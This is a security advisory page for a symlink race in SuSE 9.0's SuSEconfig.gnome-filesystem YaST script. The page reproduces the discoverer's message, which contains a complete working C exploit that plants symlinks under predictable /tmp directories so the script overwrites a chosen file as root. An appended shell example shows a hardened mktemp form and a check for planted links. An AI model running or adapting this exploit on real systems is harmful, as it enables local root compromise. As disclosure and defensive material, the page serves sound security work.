SecurityTracker.com
Category:   Application (Generic)  >   SuSEconfig.gnome-filesystem
Vendors:   SuSE
SuSEconfig.gnome-filesystem Temporary File Symlink Flaw Lets Local Users Overwrite Files With Root Privileges
SecurityTracker Alert ID:  1008703
SecurityTracker URL:  http://securitytracker.com/id/1008703
CVE Reference:   CAN-2004-0064
Updated:  Jan 20 2004
Original Entry Date:  Jan 13 2004
Impact:   Modification of system information, Root access via local system
Exploit Included:  Yes  

Description:   A vulnerability was reported in the SuSEconfig.gnome-filesystem YaST configuration script. A local user can overwrite arbitrary files on the system.

l0om from excluded.org reported that the configuration script creates temporary files in an unsafe manner. A local user can pre-create a likely temporary directory name (of the form '/tmp/tmp.SuSEconfig.gnome-filesystem.[RANDOM]') and place in it a symbolic link that points to a critical file on the system. Then, when a configuration change is made with the YaST tool, the script is executed and the file the symlink points to is overwritten with root privileges.

A demonstration exploit script is provided in the Source Message.

Impact:   A local user can overwrite arbitrary files on the system with root privileges and thereby gain root privileges.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.suse.com
Cause:   Access control error, State error
Underlying OS:   Linux (SuSE)

Message History:   None.


 Source Message Contents

Date:  13 Jan 2004 20:28:15 -0000
Subject:  SuSE linux 9.0 YaST config Skribt [exploit]




 Author: l0om <l0om@excluded.org>  
 Date: 12.01.2004 
 page: www.excluded.org  
 
 SuSE 9.0 - YaST script SuSEconfig.gnome-filesystem  
  
 There is a symlink problem in the SuSEconfig.gnome-filesystem script. A normal user can create and overwrite every file on the system. This script gets executed after a configuration change by the setup tool YaST. So if you have installed gnome or parts of gnome check this out.
  
  
 When this script gets executed by YaST after a configuration change it does the following:
  
 TEMP=/tmp/tmp.SuSEconfig.gnome-filesystem.$RANDOM  
 mkdir $TEMP  
 touch $TEMP/list  
 [...]  
 echo >$TEMP/found  
 [...]  
  
 The env variable $RANDOM includes a random number. In my tests this number goes up from 1 to 33000. But also if it goes up to 65535 it is still vulnerable to a symlink attack. This is nearly as bad as the symlink problem which has been found on SuSE 8.2. On 8.2 a SuSEconf script has created a link with the $$ at the file end.
  
 I have used a little exploit written in C which creates the directory "/tmp/tmp.SuSEconfig.gnome-filesystem.1" up to 33000. In every directory I have created a symlink to a file which I want to create or to overwrite. As the filename I have taken the $TEMP/found and let it point to some file. In my test I have taken the /etc/nologin- and hey- it has worked!
  
 have phun!  
  
  
*******************************************************************/  
  
 #include <stdio.h>
 #include <stdlib.h>     /* exit() */
 #include <string.h>
 #include <unistd.h>
 #include <sys/types.h>
 #include <sys/stat.h>   /* mkdir(), umask() */

 #define PATH "/tmp/tmp.SuSEconfig.gnome-filesystem."
 #define START 1
 #define END 33000

 int main(int argc, char **argv)
 {
     int i;
     char buf[150];

     printf("\tSuSE 9.0 YaST script SuSEconfig.gnome-filesystem exploit\n");
     printf("\t-------------------------------------------------------------\n");
     printf("\tdiscovered and written by l0om <l0om@excluded.org>\n");
     printf("\t WWW.EXCLUDED.ORG\n\n");

     if(argc != 2) {
         printf("usage: %s <destination-file>\n",argv[0]);
         exit(0xff);
     }

     printf("### hit enter to create or overwrite file %s: ",argv[1]); fflush(stdout);
     read(1, buf, 1); fflush(stdin);

     umask(0000);
     printf("working\n\n");
     /* one directory per candidate $RANDOM value, each holding a "found" symlink */
     for(i = START; i < END; i++) {
         snprintf(buf, sizeof(buf),"%s%d",PATH,i);
         if(mkdir(buf,00777) == -1) {
             fprintf(stderr, "cannot creat directory [Nr.%d]\n",i);
             exit(0xff);
         }
         if(!(i%1000))printf(".");
         strcat(buf, "/found");
         if(symlink(argv[1], buf) == -1) {
             fprintf(stderr, "cannot creat symlink from %s to %s [Nr.%d]\n",buf,argv[1],i);
             exit(0xff);
         }
     }
     printf("\ndone!\n");
     printf("next time the SuSE.gnome-filesystem script gets executed\n");
     printf("we will create or overwrite file %s\n",argv[1]);
     return(0x00);
 }  /* i cant wait for the new gobbles comic!! */
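
Added example (not part of l0om's message and not SuSE's script): the temporary-directory pattern quoted in the message next to a hardened form that uses mktemp -d and the shell's noclobber option, plus a check that lists symlinks sitting under the predictable directory names. The function names are hypothetical, and mktemp(1) is assumed to be installed.

```sh
#!/bin/sh
# Added example, not SuSE's code: the temp-dir pattern quoted in the message
# beside a hardened form. Function names are hypothetical.
PREFIX=tmp.SuSEconfig.gnome-filesystem

# Pattern as quoted: predictable name, mkdir result ignored, and ">" follows
# whatever already sits at $TEMP/found.
# $1 = temp base, $2 = number standing in for $RANDOM.
legacy_tmp_write() {
    TEMP="$1/$PREFIX.$2"
    mkdir "$TEMP" 2>/dev/null    # fails if the directory was pre-created
    echo > "$TEMP/found"         # still runs, through any symlink at that path
}

# Create a file only if nothing exists at the path. With noclobber (set -C)
# the shell refuses existing regular files and opens new ones with O_EXCL,
# so a symlink at the path (dangling or not) makes the call fail.
safe_create() {
    ( set -C; : > "$1" ) 2>/dev/null
}

# Hardened form: mktemp -d creates a mode-0700 directory with an
# unpredictable name atomically and fails rather than reuse an existing path.
# Prints the directory on success; the caller removes it when finished.
hardened_tmp_setup() {
    dir=$(mktemp -d "$1/$PREFIX.XXXXXXXXXX") || return 1
    safe_create "$dir/list" && safe_create "$dir/found" || { rm -rf "$dir"; return 1; }
    printf '%s\n' "$dir"
}

# Defender check: list symlinks inside directories that match the
# predictable naming scheme under temp base $1.
find_planted_links() {
    find "$1" -path "$1/$PREFIX.*/*" -type l 2>/dev/null
}
```

On a live system, find_planted_links /tmp shows whether such links are already waiting for the next YaST run.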

 
 

